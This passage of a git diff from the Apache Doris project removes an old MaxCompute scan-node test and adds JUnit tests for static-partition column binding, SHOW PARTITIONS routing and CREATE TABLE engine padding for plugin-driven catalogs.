@Test - public void testStatsIncludePartitionValuesEntry() { - ExecutorService executor = Executors.newSingleThreadExecutor(); - try { - MaxComputeExternalMetaCache cache = new MaxComputeExternalMetaCache(executor); - long catalogId = 1L; - cache.initCatalog(catalogId, Collections.emptyMap()); - - Map stats = cache.stats(catalogId); - Assert.assertTrue(stats.containsKey(MaxComputeExternalMetaCache.ENTRY_PARTITION_VALUES)); - Assert.assertTrue(stats.containsKey(MaxComputeExternalMetaCache.ENTRY_SCHEMA)); - } finally { - executor.shutdownNow(); - } - } - - @Test - public void testPartitionValuesDefaultSpecUsesTableLevelCapacity() { - ExecutorService executor = Executors.newSingleThreadExecutor(); - long originalPartitionCapacity = Config.max_hive_partition_cache_num; - long originalPartitionTableCapacity = Config.max_hive_partition_table_cache_num; - long originalRefreshTime = Config.external_cache_refresh_time_minutes; - try { - Config.max_hive_partition_cache_num = 100L; - Config.max_hive_partition_table_cache_num = 20L; - Config.external_cache_refresh_time_minutes = 3L; - - MaxComputeExternalMetaCache cache = new MaxComputeExternalMetaCache(executor); - long catalogId = 1L; - cache.initCatalog(catalogId, Collections.emptyMap()); - - MetaCacheEntryStats partitionValuesStats = cache.stats(catalogId) - .get(MaxComputeExternalMetaCache.ENTRY_PARTITION_VALUES); - Assert.assertEquals(20L, partitionValuesStats.getCapacity()); - Assert.assertEquals(180L, partitionValuesStats.getTtlSecond()); - } finally { - Config.max_hive_partition_cache_num = originalPartitionCapacity; - Config.max_hive_partition_table_cache_num = originalPartitionTableCapacity; - Config.external_cache_refresh_time_minutes = originalRefreshTime; - executor.shutdownNow(); - } - } -} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNodeTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNodeTest.java deleted file mode 100644 index 4989c2c53f21cb..00000000000000 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNodeTest.java +++ /dev/null @@ -1,463 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute.source; - -import org.apache.doris.analysis.BinaryPredicate; -import org.apache.doris.analysis.Expr; -import org.apache.doris.analysis.InPredicate; -import org.apache.doris.analysis.SlotDescriptor; -import org.apache.doris.analysis.SlotRef; -import org.apache.doris.analysis.StringLiteral; -import org.apache.doris.analysis.TupleDescriptor; -import org.apache.doris.analysis.TupleId; -import org.apache.doris.catalog.Column; -import org.apache.doris.catalog.PrimitiveType; -import org.apache.doris.common.UserException; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.datasource.maxcompute.source.MaxComputeSplit.SplitType; -import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; -import org.apache.doris.planner.PlanNode; -import org.apache.doris.planner.PlanNodeId; -import org.apache.doris.planner.ScanContext; -import org.apache.doris.qe.SessionVariable; -import org.apache.doris.spi.Split; - -import com.aliyun.odps.table.DataFormat; -import com.aliyun.odps.table.DataSchema; -import com.aliyun.odps.table.SessionStatus; -import com.aliyun.odps.table.TableIdentifier; -import com.aliyun.odps.table.read.TableBatchReadSession; -import com.aliyun.odps.table.read.split.InputSplitAssigner; -import com.google.common.collect.Lists; -import org.junit.Assert; -import org.junit.Before; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.mockito.Mock; -import org.mockito.Mockito; -import org.mockito.junit.MockitoJUnitRunner; - -import java.io.IOException; -import java.lang.reflect.Field; -import java.lang.reflect.Method; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.Collections; -import java.util.Date; -import java.util.List; - -@RunWith(MockitoJUnitRunner.class) -public class MaxComputeScanNodeTest { - - @Mock - private MaxComputeExternalTable table; - - @Mock - private MaxComputeExternalCatalog catalog; - - @Mock - private com.aliyun.odps.Table odpsTable; - - private SessionVariable sv; - private TupleDescriptor desc; - private MaxComputeScanNode node; - - private List partitionColumns; - - @Before - public void setUp() { - partitionColumns = Arrays.asList( - new Column("dt", PrimitiveType.VARCHAR), - new Column("hr", PrimitiveType.VARCHAR) - ); - Mockito.when(table.getPartitionColumns()).thenReturn(partitionColumns); - Mockito.when(table.getCatalog()).thenReturn(catalog); - Mockito.when(table.getOdpsTable()).thenReturn(odpsTable); - - desc = Mockito.mock(TupleDescriptor.class); - Mockito.when(desc.getTable()).thenReturn(table); - Mockito.when(desc.getId()).thenReturn(new TupleId(0)); - Mockito.when(desc.getSlots()).thenReturn(new ArrayList<>()); - - sv = new SessionVariable(); - node = new MaxComputeScanNode(new PlanNodeId(0), desc, - SelectedPartitions.NOT_PRUNED, false, sv, ScanContext.EMPTY); - } - - // ==================== Reflection Helpers ==================== - - private void setConjuncts(PlanNode target, List conjuncts) throws Exception { - Field f = PlanNode.class.getDeclaredField("conjuncts"); - f.setAccessible(true); - f.set(target, conjuncts); - } - - private void setLimit(PlanNode target, long limit) throws Exception { - Field f = PlanNode.class.getDeclaredField("limit"); - f.setAccessible(true); - f.setLong(target, limit); - } - - private void setOnlyPartitionEqualityPredicate(MaxComputeScanNode target, boolean value) throws Exception { - Field f = MaxComputeScanNode.class.getDeclaredField("onlyPartitionEqualityPredicate"); - f.setAccessible(true); - f.setBoolean(target, value); - } - - private boolean invokeCheckOnlyPartitionEqualityPredicate(MaxComputeScanNode target) throws Exception { - Method m = MaxComputeScanNode.class.getDeclaredMethod("checkOnlyPartitionEqualityPredicate"); - m.setAccessible(true); - return (boolean) m.invoke(target); - } - - // ==================== Group 1: checkOnlyPartitionEqualityPredicate ==================== - - @Test - public void testCheckOnlyPartEq_emptyConjuncts() throws Exception { - setConjuncts(node, new ArrayList<>()); - Assert.assertTrue(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_singlePartitionEquality() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - StringLiteral val = new StringLiteral("2026-02-26"); - BinaryPredicate eq = new BinaryPredicate(BinaryPredicate.Operator.EQ, dtSlot, val); - setConjuncts(node, Lists.newArrayList(eq)); - Assert.assertTrue(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_multiPartitionEquality() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - SlotRef hrSlot = new SlotRef(null, "hr"); - BinaryPredicate eq1 = new BinaryPredicate(BinaryPredicate.Operator.EQ, dtSlot, new StringLiteral("x")); - BinaryPredicate eq2 = new BinaryPredicate(BinaryPredicate.Operator.EQ, hrSlot, new StringLiteral("10")); - setConjuncts(node, Lists.newArrayList(eq1, eq2)); - Assert.assertTrue(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_nonPartitionColumn() throws Exception { - SlotRef statusSlot = new SlotRef(null, "status"); - BinaryPredicate eq = new BinaryPredicate(BinaryPredicate.Operator.EQ, statusSlot, new StringLiteral("active")); - setConjuncts(node, Lists.newArrayList(eq)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_nonEqOperator() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - BinaryPredicate gt = new BinaryPredicate(BinaryPredicate.Operator.GT, dtSlot, new StringLiteral("2026-01-01")); - setConjuncts(node, Lists.newArrayList(gt)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_inPredicateOnPartitionColumn() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - List inList = Lists.newArrayList(new StringLiteral("a"), new StringLiteral("b")); - InPredicate inPred = new InPredicate(dtSlot, inList, false); - setConjuncts(node, Lists.newArrayList(inPred)); - Assert.assertTrue(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_notInPredicate() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - List inList = Lists.newArrayList(new StringLiteral("a"), new StringLiteral("b")); - InPredicate notInPred = new InPredicate(dtSlot, inList, true); - setConjuncts(node, Lists.newArrayList(notInPred)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_inPredicateOnNonPartitionColumn() throws Exception { - SlotRef statusSlot = new SlotRef(null, "status"); - List inList = Lists.newArrayList(new StringLiteral("a"), new StringLiteral("b")); - InPredicate inPred = new InPredicate(statusSlot, inList, false); - setConjuncts(node, Lists.newArrayList(inPred)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_inPredicateWithNonLiteralValue() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - SlotRef hrSlot = new SlotRef(null, "hr"); - List inList = Lists.newArrayList(hrSlot); - InPredicate inPred = new InPredicate(dtSlot, inList, false); - setConjuncts(node, Lists.newArrayList(inPred)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_mixedEqAndInOnPartitionColumns() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - BinaryPredicate eq = new BinaryPredicate(BinaryPredicate.Operator.EQ, dtSlot, new StringLiteral("2026-01-01")); - - SlotRef hrSlot = new SlotRef(null, "hr"); - List inList = Lists.newArrayList(new StringLiteral("10"), new StringLiteral("11")); - InPredicate inPred = new InPredicate(hrSlot, inList, false); - - setConjuncts(node, Lists.newArrayList(eq, inPred)); - Assert.assertTrue(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_leftSideNotSlotRef() throws Exception { - StringLiteral left = new StringLiteral("x"); - StringLiteral right = new StringLiteral("x"); - BinaryPredicate eq = new BinaryPredicate(BinaryPredicate.Operator.EQ, left, right); - setConjuncts(node, Lists.newArrayList(eq)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - @Test - public void testCheckOnlyPartEq_rightSideNotLiteral() throws Exception { - SlotRef dtSlot = new SlotRef(null, "dt"); - SlotRef hrSlot = new SlotRef(null, "hr"); - BinaryPredicate eq = new BinaryPredicate(BinaryPredicate.Operator.EQ, dtSlot, hrSlot); - setConjuncts(node, Lists.newArrayList(eq)); - Assert.assertFalse(invokeCheckOnlyPartitionEqualityPredicate(node)); - } - - // ==================== Serializable Stub for TableBatchReadSession ==================== - - private static class StubTableBatchReadSession implements TableBatchReadSession { - private static final long serialVersionUID = 1L; - private transient InputSplitAssigner assigner; - - StubTableBatchReadSession(InputSplitAssigner assigner) { - this.assigner = assigner; - } - - @Override - public InputSplitAssigner getInputSplitAssigner() throws IOException { - return assigner; - } - - @Override - public DataSchema readSchema() { - return null; - } - - @Override - public boolean supportsDataFormat(DataFormat dataFormat) { - return false; - } - - @Override - public String getId() { - return "stub-session"; - } - - @Override - public TableIdentifier getTableIdentifier() { - return null; - } - - @Override - public SessionStatus getStatus() { - return SessionStatus.NORMAL; - } - - @Override - public String toJson() { - return "{}"; - } - } - - // ==================== Mock Session Helper ==================== - - private MaxComputeScanNode createSpyNodeWithMockSession(long totalRowCount) throws Exception { - MaxComputeScanNode spyNode = Mockito.spy(node); - - InputSplitAssigner mockAssigner = Mockito.mock(InputSplitAssigner.class); - com.aliyun.odps.table.read.split.InputSplit mockInputSplit = - Mockito.mock(com.aliyun.odps.table.read.split.InputSplit.class); - - Mockito.when(mockAssigner.getTotalRowCount()).thenReturn(totalRowCount); - Mockito.when(mockAssigner.getSplitByRowOffset(Mockito.anyLong(), Mockito.anyLong())) - .thenReturn(mockInputSplit); - Mockito.when(mockInputSplit.getSessionId()).thenReturn("test-session-id"); - - StubTableBatchReadSession stubSession = new StubTableBatchReadSession(mockAssigner); - - Mockito.doReturn(stubSession).when(spyNode) - .createTableBatchReadSession(Mockito.anyList(), Mockito.any( - com.aliyun.odps.table.configuration.SplitOptions.class)); - Mockito.doReturn(stubSession).when(spyNode) - .createTableBatchReadSession(Mockito.anyList()); - - Mockito.when(odpsTable.getLastDataModifiedTime()).thenReturn(new Date(1000L)); - - return spyNode; - } - - // ==================== Group 2: getSplitsWithLimitOptimization ==================== - - private List invokeGetSplitsWithLimitOptimization( - MaxComputeScanNode target) throws Exception { - Method m = MaxComputeScanNode.class.getDeclaredMethod( - "getSplitsWithLimitOptimization", List.class); - m.setAccessible(true); - @SuppressWarnings("unchecked") - List result = (List) m.invoke(target, Collections.emptyList()); - return result; - } - - @Test - public void testLimitOpt_limitLessThanTotal() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeWithMockSession(10000L); - setLimit(spyNode, 100L); - - List result = invokeGetSplitsWithLimitOptimization(spyNode); - - Assert.assertEquals(1, result.size()); - MaxComputeSplit split = (MaxComputeSplit) result.get(0); - Assert.assertEquals(SplitType.ROW_OFFSET, split.splitType); - Assert.assertEquals(100L, split.getLength()); - } - - @Test - public void testLimitOpt_limitGreaterThanTotal() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeWithMockSession(200L); - setLimit(spyNode, 50000L); - - List result = invokeGetSplitsWithLimitOptimization(spyNode); - - Assert.assertEquals(1, result.size()); - MaxComputeSplit split = (MaxComputeSplit) result.get(0); - Assert.assertEquals(SplitType.ROW_OFFSET, split.splitType); - Assert.assertEquals(200L, split.getLength()); - } - - @Test - public void testLimitOpt_totalRowCountZero() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeWithMockSession(0L); - setLimit(spyNode, 100L); - - List result = invokeGetSplitsWithLimitOptimization(spyNode); - - Assert.assertTrue(result.isEmpty()); - } - - // ==================== Group 3: getSplits gating conditions ==================== - - private MaxComputeScanNode createSpyNodeForGetSplits(long totalRowCount) throws Exception { - // Need non-empty slots so getSplits doesn't return early - SlotDescriptor mockSlotDesc = Mockito.mock(SlotDescriptor.class); - Column dataCol = new Column("value", PrimitiveType.VARCHAR); - Mockito.when(mockSlotDesc.getColumn()).thenReturn(dataCol); - Mockito.when(desc.getSlots()).thenReturn(Lists.newArrayList(mockSlotDesc)); - - // Need fileNum > 0 - Mockito.when(odpsTable.getFileNum()).thenReturn(10L); - - // For normal path: use row_count strategy - Mockito.when(catalog.getSplitStrategy()).thenReturn("row_count"); - Mockito.when(catalog.getSplitRowCount()).thenReturn(totalRowCount); - - // Need table.getColumns() for createRequiredColumns() - List allColumns = Lists.newArrayList( - new Column("dt", PrimitiveType.VARCHAR), - new Column("hr", PrimitiveType.VARCHAR), - new Column("value", PrimitiveType.VARCHAR) - ); - Mockito.when(table.getColumns()).thenReturn(allColumns); - - return createSpyNodeWithMockSession(totalRowCount); - } - - @Test - public void testGetSplits_allConditionsMet_optimizationPath() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeForGetSplits(10000L); - sv.enableMcLimitSplitOptimization = true; - setOnlyPartitionEqualityPredicate(spyNode, true); - setLimit(spyNode, 100L); - - List result = spyNode.getSplits(1); - - Assert.assertEquals(1, result.size()); - MaxComputeSplit split = (MaxComputeSplit) result.get(0); - Assert.assertEquals(SplitType.ROW_OFFSET, split.splitType); - Assert.assertEquals(100L, split.getLength()); - } - - @Test - public void testGetSplits_optimizationDisabled_normalPath() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeForGetSplits(1000L); - sv.enableMcLimitSplitOptimization = false; - setOnlyPartitionEqualityPredicate(spyNode, true); - setLimit(spyNode, 100L); - - List result = spyNode.getSplits(1); - - // Normal path with row_count strategy: totalRowCount=1000, splitRowCount=1000 → 1 split - // but the split length equals splitRowCount, not limit - Assert.assertFalse(result.isEmpty()); - } - - @Test - public void testGetSplits_nonPartitionPredicate_normalPath() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeForGetSplits(1000L); - sv.enableMcLimitSplitOptimization = true; - setOnlyPartitionEqualityPredicate(spyNode, false); - setLimit(spyNode, 100L); - - List result = spyNode.getSplits(1); - - Assert.assertFalse(result.isEmpty()); - } - - @Test - public void testGetSplits_noLimit_normalPath() throws Exception { - MaxComputeScanNode spyNode = createSpyNodeForGetSplits(1000L); - sv.enableMcLimitSplitOptimization = true; - setOnlyPartitionEqualityPredicate(spyNode, true); - // limit defaults to -1 (no limit), don't set it - - List result = spyNode.getSplits(1); - - Assert.assertFalse(result.isEmpty()); - } - - @Test - public void testGetSplitsRejectsOdpsExternalTable() { - assertGetSplitsRejectsUnsupportedOdpsTable(true, false, "mc_external_table"); - } - - @Test - public void testGetSplitsRejectsOdpsLogicalView() { - assertGetSplitsRejectsUnsupportedOdpsTable(false, true, "mc_logical_view"); - } - - private void assertGetSplitsRejectsUnsupportedOdpsTable(boolean isExternalTable, boolean isVirtualView, - String tableName) { - Mockito.when(odpsTable.isExternalTable()).thenReturn(isExternalTable); - Mockito.when(odpsTable.isVirtualView()).thenReturn(isVirtualView); - Mockito.when(table.getDbName()).thenReturn("default"); - Mockito.when(table.getName()).thenReturn(tableName); - - UserException exception = Assert.assertThrows(UserException.class, () -> node.getSplits(1)); - Assert.assertTrue(exception.getMessage().contains( - "Reading MaxCompute external table or logical view is not supported: default." + tableName)); - Mockito.verify(odpsTable, Mockito.never()).getFileNum(); - } -} diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/rules/analysis/BindConnectorSinkStaticPartitionTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/rules/analysis/BindConnectorSinkStaticPartitionTest.java new file mode 100644 index 00000000000000..5f6e85426eca56 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/rules/analysis/BindConnectorSinkStaticPartitionTest.java @@ -0,0 +1,128 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.nereids.rules.analysis; + +import org.apache.doris.catalog.Column; +import org.apache.doris.catalog.PrimitiveType; +import org.apache.doris.datasource.PluginDrivenExternalTable; +import org.apache.doris.nereids.exceptions.AnalysisException; + +import com.google.common.collect.ImmutableList; +import com.google.common.collect.ImmutableSet; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Collections; +import java.util.List; +import java.util.stream.Collectors; + +/** + * Tests for {@link BindSink#selectConnectorSinkBindColumns} — the bind-time column selection for the + * generic connector table sink (FIX-BIND-STATIC-PARTITION, P0-3). + * + *

Root cause this guards: before the fix, the no-column-list path bound the full base schema + * (including partition columns), so {@code INSERT INTO mc PARTITION(pt='x') SELECT } + * produced more bound columns than the query output and threw "insert into cols should be corresponding + * to the query output" at bind. The static partition columns carry their value via the static partition + * spec (not the query), so they must be excluded from the bound columns — mirroring legacy + * {@code bindMaxComputeTableSink}.

+ */ +public class BindConnectorSinkStaticPartitionTest { + + private static final Column ID = new Column("id", PrimitiveType.INT); + private static final Column VAL = new Column("val", PrimitiveType.INT); + private static final Column DS = new Column("ds", PrimitiveType.INT); + private static final Column REGION = new Column("region", PrimitiveType.INT); + // Base schema appends partition columns after the data columns (as the connector reports it). + private static final List BASE_SCHEMA = ImmutableList.of(ID, VAL, DS, REGION); + + private static PluginDrivenExternalTable partitionedTable() { + PluginDrivenExternalTable table = Mockito.mock(PluginDrivenExternalTable.class); + Mockito.when(table.getBaseSchema(true)).thenReturn(BASE_SCHEMA); + for (Column c : BASE_SCHEMA) { + Mockito.when(table.getColumn(c.getName())).thenReturn(c); + } + return table; + } + + private static List names(List columns) { + return columns.stream().map(Column::getName).collect(Collectors.toList()); + } + + /** + * No column list, all-static {@code PARTITION(ds='x', region='y')}: both partition columns are + * statically specified and must be excluded from the bound columns, leaving only the data columns + * so the count matches the query output (the original blocker). + */ + @Test + public void noColumnListAllStaticExcludesPartitionColumns() { + List bound = BindSink.selectConnectorSinkBindColumns( + partitionedTable(), Collections.emptyList(), ImmutableSet.of("ds", "region")); + Assertions.assertEquals(ImmutableList.of("id", "val"), names(bound), + "static partition columns must be excluded from the bound columns"); + } + + /** + * No column list, partial-static {@code PARTITION(ds='x') SELECT id, val, region}: only the static + * 'ds' is excluded; the dynamic 'region' stays (its value comes from the query). + */ + @Test + public void noColumnListPartialStaticExcludesOnlyStaticColumn() { + List bound = BindSink.selectConnectorSinkBindColumns( + partitionedTable(), Collections.emptyList(), ImmutableSet.of("ds")); + Assertions.assertEquals(ImmutableList.of("id", "val", "region"), names(bound), + "only the statically-specified partition column must be excluded"); + } + + /** + * No column list, no static partition (pure dynamic, e.g. {@code INSERT ... SELECT id,val,ds,region}): + * nothing is excluded — the full base schema is bound, so the existing dynamic/JDBC path is + * unchanged. + */ + @Test + public void noColumnListNoStaticPartitionBindsFullSchema() { + List bound = BindSink.selectConnectorSinkBindColumns( + partitionedTable(), Collections.emptyList(), Collections.emptySet()); + Assertions.assertEquals(ImmutableList.of("id", "val", "ds", "region"), names(bound), + "without a static partition spec the full base schema is bound"); + } + + /** + * Explicit column list: bound columns follow the user-specified list verbatim and are not affected + * by the static partition spec (the user already chose which columns the query provides). + */ + @Test + public void explicitColumnListUsesUserColumnsVerbatim() { + List bound = BindSink.selectConnectorSinkBindColumns( + partitionedTable(), ImmutableList.of("val", "id"), ImmutableSet.of("ds")); + Assertions.assertEquals(ImmutableList.of("val", "id"), names(bound), + "explicit column list is bound in user order, unaffected by static partitions"); + } + + /** + * Explicit column list naming an unknown column fails loud with a clear message (unchanged behavior). + */ + @Test + public void explicitColumnListUnknownColumnThrows() { + AnalysisException ex = Assertions.assertThrows(AnalysisException.class, () -> + BindSink.selectConnectorSinkBindColumns( + partitionedTable(), ImmutableList.of("nope"), Collections.emptySet())); + Assertions.assertTrue(ex.getMessage().contains("nope"), "error must name the missing column"); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java new file mode 100644 index 00000000000000..a3e830080c6aec --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommandPluginDrivenTest.java @@ -0,0 +1,103 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.nereids.trees.plans.commands; + +import org.apache.doris.catalog.info.TableNameInfo; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.datasource.ExternalDatabase; +import org.apache.doris.datasource.ExternalTable; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.qe.ShowResultSet; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.Arrays; +import java.util.List; +import java.util.Optional; + +/** + * Tests for SHOW PARTITIONS dispatch to a {@link PluginDrivenExternalCatalog} added by + * P4-T06c (ShowPartitionsCommand.handleShowPluginDrivenTablePartitions). + * + *

Why: after the MaxCompute SPI cutover, a {@code max_compute} catalog is a + * {@link PluginDrivenExternalCatalog}. The legacy handler keyed on + * {@code instanceof MaxComputeExternalCatalog} no longer matches, so SHOW PARTITIONS + * must route through the connector SPI instead. This test locks in that the new handler + * resolves the table handle using the REMOTE db/table names and emits one row per + * partition returned by {@code listPartitionNames}.

+ */ +public class ShowPartitionsCommandPluginDrivenTest { + + @Test + public void testHandlerRoutesToSpiWithRemoteNames() throws Exception { + TableNameInfo tableName = Mockito.mock(TableNameInfo.class); + Mockito.when(tableName.getDb()).thenReturn("db"); + Mockito.when(tableName.getTbl()).thenReturn("t"); + + ShowPartitionsCommand command = new ShowPartitionsCommand(tableName, null, null, -1L, -1L, false); + + ConnectorSession session = Mockito.mock(ConnectorSession.class); + Connector connector = Mockito.mock(Connector.class); + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + + PluginDrivenExternalCatalog catalog = Mockito.mock(PluginDrivenExternalCatalog.class); + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + ExternalTable table = Mockito.mock(ExternalTable.class); + Mockito.when(table.getRemoteDbName()).thenReturn("remote_db"); + Mockito.when(table.getRemoteName()).thenReturn("remote_tbl"); + + // Resolution chain: catalog.getDbOrAnalysisException(db).getTableOrAnalysisException(t) -> table. + // doReturn avoids generic-type checks on the default interface methods. + Mockito.doReturn(db).when(catalog).getDbOrAnalysisException("db"); + Mockito.doReturn(table).when(db).getTableOrAnalysisException("t"); + Mockito.when(catalog.buildConnectorSession()).thenReturn(session); + Mockito.when(catalog.getConnector()).thenReturn(connector); + Mockito.when(connector.getMetadata(session)).thenReturn(metadata); + Mockito.when(metadata.getTableHandle(session, "remote_db", "remote_tbl")) + .thenReturn(Optional.of(handle)); + Mockito.when(metadata.listPartitionNames(session, handle)) + .thenReturn(Arrays.asList("pt=2", "pt=1")); + + setField(command, "catalog", catalog); + + Method m = ShowPartitionsCommand.class.getDeclaredMethod("handleShowPluginDrivenTablePartitions"); + m.setAccessible(true); + ShowResultSet rs = (ShowResultSet) m.invoke(command); + + List> rows = rs.getResultRows(); + Assertions.assertEquals(2, rows.size()); + // sorted ascending by partition name + Assertions.assertEquals("pt=1", rows.get(0).get(0)); + Assertions.assertEquals("pt=2", rows.get(1).get(0)); + Mockito.verify(metadata).getTableHandle(session, "remote_db", "remote_tbl"); + } + + private static void setField(Object target, String name, Object value) throws Exception { + Field f = ShowPartitionsCommand.class.getDeclaredField(name); + f.setAccessible(true); + f.set(target, value); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoEngineCatalogTest.java b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoEngineCatalogTest.java new file mode 100644 index 00000000000000..1849163bfdec9e --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/info/CreateTableInfoEngineCatalogTest.java @@ -0,0 +1,191 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.nereids.trees.plans.commands.info; + +import org.apache.doris.catalog.Env; +import org.apache.doris.datasource.CatalogMgr; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.nereids.exceptions.AnalysisException; +import org.apache.doris.qe.ConnectContext; + +import com.google.common.collect.Lists; +import org.junit.jupiter.api.AfterEach; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.Test; +import org.mockito.MockedStatic; +import org.mockito.Mockito; + +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import java.util.ArrayList; +import java.util.HashMap; + +/** + * Tests engine-padding / catalog-engine-consistency in {@link CreateTableInfo} for a + * {@link PluginDrivenExternalCatalog}, the form a {@code max_compute} catalog takes after the + * SPI cutover (T06b). FIX-DDL-ENGINE (P4-T06d). + * + *

Why these tests matter: {@code paddingEngineName} and {@code checkEngineWithCatalog} + * key on {@code instanceof MaxComputeExternalCatalog}; after cutover the catalog is a + * {@code PluginDrivenExternalCatalog} (type {@code "max_compute"}), so a no-ENGINE CREATE TABLE + * (the most common MC form) threw "Current catalog does not support create table" at analysis + * time and never reached the working {@code createTable} override. These tests lock in that the + * engine is padded to {@code maxcompute} (plain CREATE and CTAS), that the catalog-engine + * consistency check still rejects a wrong explicit ENGINE, and that the non-CREATE-TABLE SPI + * types (jdbc/es/trino) keep their legacy behavior.

+ * + *

Both gate methods re-fetch the catalog by name via + * {@code Env.getCurrentEnv().getCatalogMgr().getCatalog(ctlName)}, so the test catalog must be + * registered into a mocked {@link CatalogMgr} — a directly-constructed catalog would be ignored. + * The gate methods are private, so they are invoked reflectively.

